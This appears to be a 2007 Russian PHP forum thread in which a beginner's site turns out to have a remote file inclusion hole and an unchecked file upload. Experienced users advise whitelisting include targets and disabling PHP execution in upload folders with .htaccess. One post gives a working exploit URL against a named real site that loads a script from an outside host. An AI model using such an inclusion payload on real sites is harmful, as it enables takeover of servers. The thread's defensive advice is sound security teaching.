Форум: Форум PHPФорум ApacheФорум Регулярные ВыраженияФорум MySQLHTML+CSS+JavaScriptФорум FlashРазное
Новые темы: 0000000
PHP на примерах (2 издание). Авторы: Кузнецов М.В., Симдянов И.В. Объектно-ориентированное программирование на PHP. Авторы: Кузнецов М.В., Симдянов И.В. Самоучитель MySQL 5. Авторы: Кузнецов М.В., Симдянов И.В. Программирование. Ступени успешной карьеры. Авторы: Кузнецов М.В., Симдянов И.В. C++. Мастер-класс в задачах и примерах. Авторы: Кузнецов М.В., Симдянов И.В.
ВСЕ НАШИ КНИГИ
Консультационный центр SoftTime

Форум PHP

Выбрать другой форум

 

Здравствуйте, Посетитель!

вид форума:
Линейный форум (новые сообщения вниз) Структурный форум

тема: Защита сайта от злоумышлеников

Сообщения:  [1-10]    [11-20]  [21-21] 

 
 автор: Andchir   (05.01.2007 в 18:27)   письмо автору
 
   для: cheops   (05.01.2007 в 18:18)
 

Большое спасибо! Буду знать.

   
 
 автор: cheops   (05.01.2007 в 18:21)   письмо автору
 
   для: Andchir   (05.01.2007 в 17:31)
 

Как так... срочно убирайте - если кто-нибудь загрузит PHP-файл, он сможет с вашим сайтом сделать всё, что угодно: хоть include подставить, хоть стереть все существующие файлы. Расширения файлов следует обязательно контролировать, в папке, куда загружаются файлы следует отключить выполнение всех опасных скриптов при помощи конфигурационного файла .htaccess
RemoveHandler .php .phtml .pl
AddType text/html .php .phtm .htm .html .phtml .pl

   
 
 автор: cheops   (05.01.2007 в 18:18)   письмо автору
 
   для: Andchir   (05.01.2007 в 17:39)
 

Вообще не используйте такого способа передачи данных передавайте цифры 1, 2, 3 и т.д. а необходимые данные излекайте из массива
<?php
  $arr 
= array(=> "index.php"=> "upload/index.php"=> ...);
?>

   
 
 автор: Andchir   (05.01.2007 в 18:04)   письмо автору
 
   для: LuxeMate   (05.01.2007 в 17:43)
 

Хостинг 1ГБ. На винде. Парни, хватит уже издиваться над сайтом :)) Всё перекорёжили. Я недавно изучаю PHP, до безопасности ещё не дошел.

   
 
 автор: Unkind   (05.01.2007 в 17:45)   письмо автору
 
   для: Andchir   (05.01.2007 в 17:39)
 

Проверять, чтобы не могли подставить левую информацию.

   
 
 автор: LuxeMate   (05.01.2007 в 17:43)   письмо автору
 
   для: cheops   (05.01.2007 в 17:24)
 

277,74 Gb of 333,55 Gb is free. - класный хостинг :D
Ещё и на OS Windows небось стоит....потому что комманды Linux не выролняются с помощью system() :D

   
 
 автор: Andchir   (05.01.2007 в 17:39)   письмо автору
 
   для: Unkind   (05.01.2007 в 17:28)
 

>http://okarelia.ru/index.php?ref=http://wen-info.com/code.script - извините, но это глупейшая ошибка.
А как надо?

   
 
 автор: Unkind   (05.01.2007 в 17:34)   письмо автору
 
   для: Andchir   (05.01.2007 в 17:31)
 

Хм...Че же не убираете дыру?..

   
 
 автор: Andchir   (05.01.2007 в 17:31)   письмо автору
 
   для: cheops   (05.01.2007 в 17:27)
 

Да, есть возможность закачки файлов (не в корневую папку) и даже без проверки.

   
 
 автор: Unkind   (05.01.2007 в 17:28)   письмо автору
 
   для: Andchir   (05.01.2007 в 17:23)
 

http://okarelia.ru/index.php?ref=http://wen-info.com/code.script - извините, но это глупейшая ошибка.

   

Сообщения:  [1-10]    [11-20]  [21-21] 

Форум разработан IT-студией SoftTime
Rambler's Top100
вверх

Rambler's Top100 Яндекс.Метрика Яндекс цитирования